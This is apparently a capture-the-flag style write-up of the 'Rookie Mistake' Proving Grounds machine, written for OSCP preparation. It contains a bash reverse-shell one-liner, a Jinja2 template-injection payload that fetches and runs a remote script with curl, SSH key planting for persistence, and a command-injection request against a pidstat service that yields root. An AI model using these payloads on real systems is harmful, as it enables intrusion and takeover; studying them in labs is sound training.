Proving grounds:Rookie Mistake
3 min readDec 9, 2022
Today we will take a look at Proving grounds: Rookie Mistake. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
8080/tcp open http-proxy Werkzeug/2.1.2 Python/3.8.10
|_http-server-header: Werkzeug/2.1.2 Python/3.8.10
- Web(8080)
As the site says, there is a loophole regarding the token.
─# gobuster dir -u http://192.168.64.221:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.64.221:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2022/12/09 14:22:24 Starting gobuster in directory enumeration mode
===============================================================
/login (Status: 308) [Size: 253] [ → http://192.168.64.221:8080/login/]
/signup (Status: 308) [Size: 255] [ → http://192.168.64.221:8080/signup/]
/edit (Status: 308) [Size: 251] [ → http://192.168.64.221:8080/edit/]
Create an account.
Login to your account
View the token and enter it in jwt.io.
- SSTİ
Prepare the payload to get the reverse shell.
└─# cat exploit.sh
bash -c ‘bash -i >& /dev/tcp/192.168.49.64/4444 0>&1’
Open 80 servers for the target server to see
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
Let's run our code.
{{ config.__class__.from_envvar.__globals__.__builtins__.__import__(‘os’).popen(‘curl 192.168.49.64/exploit.sh | bash’).read() }}
If you remember the ssh port was open, let's use that and try to login with ssh
cp /root/.ssh/id_rsa.pub authorized_keys
Let's create a .ssh folder and copy authorized_keys from our server
mkdir /home/mike/.ssh
cd/home/mike/.ssh
wget IP/authorized_keys
Here we got the ssh login.
- root
Let’s look at the privileges
Looking at what’s on port 9123, we see that the pidstat command is running.
Check for Exploit
Now that we've found the exploit, let's run the payload as root and get a shell.
mike@MikeServer:~$ curl http://127.0.0.1:9123/pid/1%20-e%20bash%20exploit.sh
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”